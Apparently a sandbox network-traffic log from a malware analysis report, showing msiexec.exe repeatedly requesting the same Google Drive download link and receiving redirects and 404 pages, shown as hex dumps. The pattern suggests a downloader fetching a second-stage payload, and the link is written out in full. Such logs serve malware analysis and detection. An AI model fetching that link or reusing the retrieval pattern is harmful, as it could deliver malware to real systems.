                                                      Content-Security-Policy: script-src 'nonce-Q9e6okZvaX4vhninNqX32w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.549981142.250.181.2254436968C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 02:16:49 UTC460OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
                                                      2025-01-11 02:16:50 UTC1851INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQJsJP4HIfh8VmylOITWQR-tXwvdu4WZ_6AcYemKKiSrVne1jAR3sMlb9uvhgO_ulHym5ABbqo
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 02:16:49 GMT
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-RlzvpBrcXwbJUworh8gXKA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 02:16:50 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 63 50 38 67 78 62 52 55 48 6f 74 67 68 33 2d 31 79 72 4c 48 69 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="cP8gxbRUHotgh3-1yrLHiA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      6192.168.2.549982142.250.185.1104436968C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 02:17:00 UTC418OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
                                                      2025-01-11 02:17:01 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 02:17:01 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Content-Security-Policy: script-src 'nonce-NwTeqq6FnbGdIfsvTNPr4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      7192.168.2.549983142.250.181.2254436968C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 02:17:01 UTC460OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
                                                      2025-01-11 02:17:02 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQ3agUmCM9JZICkn4pJws8Ev7BrqSR2KSom0yDjNL8oDqghUv-kWtBI7Mj62Z0Lw4z8
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 02:17:02 GMT
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-Xv7S192T1-S8oCLgKsDWzA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 02:17:02 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 49 47 31 73 67 30 5f 7a 43 4a 56 6f 58 68 59 44 4e 74 78 4d 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oIG1sg0_zCJVoXhYDNtxMg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      8192.168.2.549984142.250.185.1104436968C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 02:17:12 UTC418OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
                                                      2025-01-11 02:17:13 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 02:17:13 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: script-src 'nonce-dtvyTdd0FMo-oazTCWl7gw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      9192.168.2.549985142.250.181.2254436968C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 02:17:13 UTC460OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
                                                      2025-01-11 02:17:14 UTC1851INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgQ5Ney-zTAkv6b3pgTGAZm36mboMJdw9GvNvXOMOMOKhBBSTBmo4WKTtBUqj1w7XPM7CliKTvM
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 02:17:14 GMT
                                                      Content-Security-Policy: script-src 'nonce-I3Kk_NToIGgyUM-oltRevg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 02:17:14 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 56 51 68 65 65 6f 63 73 62 37 66 6a 6e 41 62 32 73 76 6a 79 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yVQheeocsb7fjnAb2svjyQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      10192.168.2.549986142.250.185.1104436968C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 02:17:25 UTC418OUTGET /uc?export=download&id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Host: drive.google.com
                                                      Cache-Control: no-cache
                                                      Cookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
                                                      2025-01-11 02:17:25 UTC1920INHTTP/1.1 303 See Other
                                                      Content-Type: application/binary
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 02:17:25 GMT
                                                      Location: https://drive.usercontent.google.com/download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download
                                                      Strict-Transport-Security: max-age=31536000
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Content-Security-Policy: script-src 'nonce-Mwn56G83keFmTQDzlwJeXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Server: ESF
                                                      Content-Length: 0
                                                      X-XSS-Protection: 0
                                                      X-Frame-Options: SAMEORIGIN
                                                      X-Content-Type-Options: nosniff
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Connection: close


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.549987142.250.181.2254436968C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-11 02:17:26 UTC460OUTGET /download?id=1gkWVhvHKvM9FTZ4MdygCjYRh_925Uq_B&export=download HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                      Cache-Control: no-cache
                                                      Host: drive.usercontent.google.com
                                                      Connection: Keep-Alive
                                                      Cookie: NID=520=V8UesrpAvMBXIR6pRvntEse9j-_u0sALTTGYagcOikvZcU9m8seop63YvXLkrELYuBz-8gyXJFeP5kPGv1tjasrVadQkoyT2sD5-FruDcRq4jSW5QORWUpyCEN3BWetRGYhWZ48nW4-x2mzsVbrZZCtuC1HeFSv3YSdQCHujhUlRzfOuKCbJQDzF
                                                      2025-01-11 02:17:26 UTC1844INHTTP/1.1 404 Not Found
                                                      X-GUploader-UploadID: AFIdbgTHGMtJuoia5ZCrAByg70tFb8agvP-LqcfDD4bLZc5x5M5NLoMgN6efpyVPh8LMaDeT
                                                      Content-Type: text/html; charset=utf-8
                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                      Pragma: no-cache
                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                      Date: Sat, 11 Jan 2025 02:17:26 GMT
                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                      Cross-Origin-Opener-Policy: same-origin
                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                      Content-Security-Policy: script-src 'nonce-KoHzYevoGocFH0Az5YFqwQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                      Content-Length: 1652
                                                      Server: UploadServer
                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                      Content-Security-Policy: sandbox allow-scripts
                                                      Connection: close
                                                      2025-01-11 02:17:26 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6c 67 70 78 75 50 54 5f 41 50 4d 4e 4e 45 67 4c 4c 63 75 37 79 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="lgpxuPT_APMNNEgLLcu7yw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.549988142.250.185.1104436968C:\Windows\SysWOW64\msiexec.exe
                                                      TimestampBytes transferredDirectionData
